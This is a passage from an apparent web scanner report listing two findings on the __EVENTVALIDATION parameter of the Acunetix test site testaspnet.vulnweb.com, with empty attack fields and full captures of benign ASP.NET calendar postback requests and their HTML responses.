posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1123 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,123 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8615&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgCAoJS0k9sIZGRkbnscziys4lB7TEx%2F2vA6qM95%2FGM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLToM3fAQKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib%2FDwKo4Ib%2FDwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf%2BsAwLmnf%2BsAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna%2FQBgLmna%2FQBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk%2FAvukqT8C%2B6Td0wkC%2B6Td0wkC%2B6Tx9gIC%2B6Tx9gIC%2B6TljQoC%2B6TljQoC%2B6SZoAMC%2B6SZoAMC%2B6SNxwwC%2B6SNxwwC%2B6ThrAkC%2B6ThrAkC%2B6SVwwIC%2B6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogb7yW5cROJy8VJWdz5SvwFrShqkZA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:11:21 GMT Content-Length: 12556
Response Body - size: 12,556 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgCAoJS0k9sIZGRkbnscziys4lB7TEx/2vA6qM95/GM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLToM3fAQKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib/DwKo4Ib/DwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf+sAwLmnf+sAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna/QBgLmna/QBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk/AvukqT8C+6Td0wkC+6Td0wkC+6Tx9gIC+6Tx9gIC+6TljQoC+6TljQoC+6SZoAMC+6SZoAMC+6SNxwwC+6SNxwwC+6ThrAkC+6ThrAkC+6SVwwIC+6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogb7yW5cROJy8VJWdz5SvwFrShqkZA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8644')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:White" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8618')" style="color:Black" title="August 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8619')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8620')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8621')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8622')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8623')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8624')" style="color:Black" title="August 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8625')" style="color:Black" title="August 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8626')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8627')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8628')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8629')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8630')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8631')" style="color:Black" title="August 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8632')" style="color:Black" title="August 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8633')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8634')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8635')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8636')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8637')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8638')" style="color:Black" title="August 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8639')" style="color:Black" title="August 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8640')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8641')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8642')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8643')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8644')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8645')" style="color:Black" title="September 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8646')" style="color:Black" title="September 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8647')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8648')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8649')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8650')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8651')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8652')" style="color:Black" title="September 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1183 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,183 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8290&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgDAX7xRlNoIZGRkBF8N6FZbx8s8asCfDOnBlydHZ%2Bc%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLtpa3DDALtiZ78CwLHkIz%2BDgKK%2BZ%2FNDAKK%2BZ%2FNDAKK%2BbPgBQKK%2BbPgBQKK%2BaeHDQKK%2BaeHDQKK%2BZvsCwKK%2BZvsCwKK%2BY%2BDAwKK%2BY%2BDAwK%2Fk%2FvECQK%2Fk%2FvECQK%2Fk%2B%2BbAQK%2Fk%2B%2BbAQK%2Fk4O%2BCgK%2Fk4O%2BCgK%2Fk7fVAwK%2Fk7fVAwK%2Fk6voDAK%2Fk6voDAK%2Fk9%2BMBAK%2Fk9%2BMBAK%2Fk%2FOjDQK%2Fk%2FOjDQK%2Fk%2BfGBgK%2Fk%2BfGBgK%2Fk9uvAwK%2Fk9uvAwK%2Fk8%2FCDAK%2Fk8%2FCDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV%2BAkCkLqV%2BAkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAtzZwaV%2FlxqH7be0wYBzlOVeZLbR
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:20:37 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgDAX7xRlNoIZGRkBF8N6FZbx8s8asCfDOnBlydHZ+c=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLtpa3DDALtiZ78CwLHkIz+DgKK+Z/NDAKK+Z/NDAKK+bPgBQKK+bPgBQKK+aeHDQKK+aeHDQKK+ZvsCwKK+ZvsCwKK+Y+DAwKK+Y+DAwK/k/vECQK/k/vECQK/k++bAQK/k++bAQK/k4O+CgK/k4O+CgK/k7fVAwK/k7fVAwK/k6voDAK/k6voDAK/k9+MBAK/k9+MBAK/k/OjDQK/k/OjDQK/k+fGBgK/k+fGBgK/k9uvAwK/k9uvAwK/k8/CDAK/k8/CDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV+AkCkLqV+AkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAtzZwaV/lxqH7be0wYBzlOVeZLbR" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:White" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built 